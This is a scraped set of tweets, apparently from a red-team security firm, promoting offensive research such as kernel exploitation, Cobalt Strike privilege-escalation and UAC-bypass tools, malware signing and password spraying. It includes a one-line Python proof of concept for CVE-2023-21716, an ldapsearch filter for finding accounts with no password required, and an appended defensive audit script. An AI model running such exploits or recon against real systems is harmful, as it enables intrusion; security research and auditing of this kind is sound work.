From Theory to Practice: Kernel Heap Spray Exploitation for Privilege Escalation💥
Part two of the blog series by my colleague Alex: https://t.co/rP2eFoi01t
As the icing on the cake, they shared the complete functional exploit with @OutflankNL for utilisation by their Outflank Security Tooling (OST) customers, enhancing global cyber resilience! (2/2)
Last weekend @tijme presented Elevate & Conquer: A Journey Into Kernel Exploitation, at @BSidesLondon. The presentation explores his and Alex's research on exploiting a zero-day in VPN software, used by 40,000+ organisations worldwide! (1/2)
https://t.co/Prk5xijh0z
New offensive trade-craft added to OST: hijacks for Electron apps. This evasion technique is primarily useful for persistence. Our implementation was inspired by work done by the @NorthwaveLabs team.
I dived into exploiting leaked code signing certificates to sign malware ✍, a technique that has been actively abused in the wild by threat actors for a long time.
Blog post: https://t.co/zCy93dwMC9
Thrilled to announce that I'll be giving a 2-hour Kernel Driver Exploitation lab at @HITBSecConf, together with my colleague Jan-Jaap. 🥳
If you want to develop your first malicious kernel driver (exploit), join us on the 21st of April in Amsterdam!
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
Our red teamer @Expl0itabl3 ported MDI check instance to Python. Use it to your advantage, check if your target uses Microsoft Defender for Identity during your recon phase.
https://t.co/wWJwbaih8R
Cobalt Strike BOF that utilises AMD's Ryzen Master kernel driver to read and write physical memory. It currently escalates privileges from administrator to SYSTEM. Future goal is to add features such as disabling EDR, disabling ETW TI or dumping LSASS.
https://t.co/vErevstmwd
Northwave has conducted research into the psychological effects of a ransomware crisis on people involved in mitigating a ransomware attack. The findings reveal the deep marks that a ransomware crisis leaves on all those affected.
https://t.co/5DDksksUmZ
Cobalt Strike BOF to bypass UAC via the CMSTPLUA COM interface.
It masquerades PEB and utilises COM Elevation Moniker on the CMSTPLUA COM object to execute commands in an elevated context.
https://t.co/1dHYZ9mEZ4
90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go.
1/12
Cobalt Strike BOF foundation for kernel exploitation using CVE-2021-21551. In its current state, as a PoC, it overwrites the beacon token with the system token (privesc).
https://t.co/JR1Vao7t9c
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.
https://t.co/hTdAfHOUx3
NW’s specialists examined #Conti's internal conversations, released during the recent #leak. Extensive analysis resulted in findings never published before, from IP addresses to the method of determining the actors’ real identities. Access full blog here: https://t.co/zS3O6YSmMB
While this may sound too simple, we've managed to escalate across domains on several occasions using accounts with blank passwords 🔥!
In this blog we describe how it works, and which popular spraying tools we've updated to support empty password spraying: https://t.co/7hoJvkfjCl
Search for AD accounts with the "PASSWD_NOTREQD" flag in CobaltStrike:
ldapsearch (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) cn
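To make the semantics of that filter concrete for an audit, here is an added example (not from the tweet or from any of the tools it mentions) that applies the same logic offline: it emulates the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803 on userAccountControl and flags enabled user accounts carrying PASSWD_NOTREQD in a constructed directory export, so a defender can review and remediate them. The record layout and the simplified objectCategory values are assumptions for the sample data.

```python
# Added example: offline re-implementation of the tweet's LDAP filter logic
# for auditing. Not code from the original post or from Cobalt Strike.

# userAccountControl bits referenced in the filter (decimal values 2 and 32).
ACCOUNTDISABLE = 0x0002   # 2  -> the filter excludes accounts with this bit
PASSWD_NOTREQD = 0x0020   # 32 -> the filter selects accounts with this bit


def ldap_bitwise_and(attribute_value: int, mask: int) -> bool:
    """Emulate LDAP_MATCHING_RULE_BIT_AND, i.e.
    (userAccountControl:1.2.840.113556.1.4.803:=mask):
    true only when every bit of mask is set in the attribute value."""
    return (attribute_value & mask) == mask


def matches_filter(entry: dict) -> bool:
    """Mirror (&(objectCategory=person)(objectClass=user)
               (userAccountControl:...:=32)(!(userAccountControl:...:=2))).
    objectCategory=person is what keeps computer accounts out: in AD their
    objectClass also contains 'user', so objectClass alone is not enough."""
    if entry.get("objectCategory") != "person":
        return False
    if "user" not in entry.get("objectClass", []):
        return False
    uac = int(entry["userAccountControl"])
    return ldap_bitwise_and(uac, PASSWD_NOTREQD) and not ldap_bitwise_and(uac, ACCOUNTDISABLE)


def find_passwd_notreqd(entries):
    """Return the CNs of enabled user accounts that do not require a password."""
    return [e["cn"] for e in entries if matches_filter(e)]


# Constructed sample export (not real accounts). 512 = NORMAL_ACCOUNT,
# 4096 = WORKSTATION_TRUST_ACCOUNT. objectCategory is simplified to its
# lDAPDisplayName rather than the full schema DN a real export would carry.
SAMPLE_ENTRIES = [
    {"cn": "alice",   "objectCategory": "person",   "objectClass": ["top", "person", "user"], "userAccountControl": 512},
    {"cn": "svc-old", "objectCategory": "person",   "objectClass": ["top", "person", "user"], "userAccountControl": 512 | 32},
    {"cn": "bob",     "objectCategory": "person",   "objectClass": ["top", "person", "user"], "userAccountControl": 512 | 32 | 2},
    {"cn": "WS01$",   "objectCategory": "computer", "objectClass": ["top", "person", "user", "computer"], "userAccountControl": 4096 | 32},
]

if __name__ == "__main__":
    for cn in find_passwd_notreqd(SAMPLE_ENTRIES):
        print(f"review: {cn} is enabled and has PASSWD_NOTREQD set")
```

Only svc-old is reported: alice lacks the flag, bob is disabled, and WS01$ is a computer object despite its objectClass containing user.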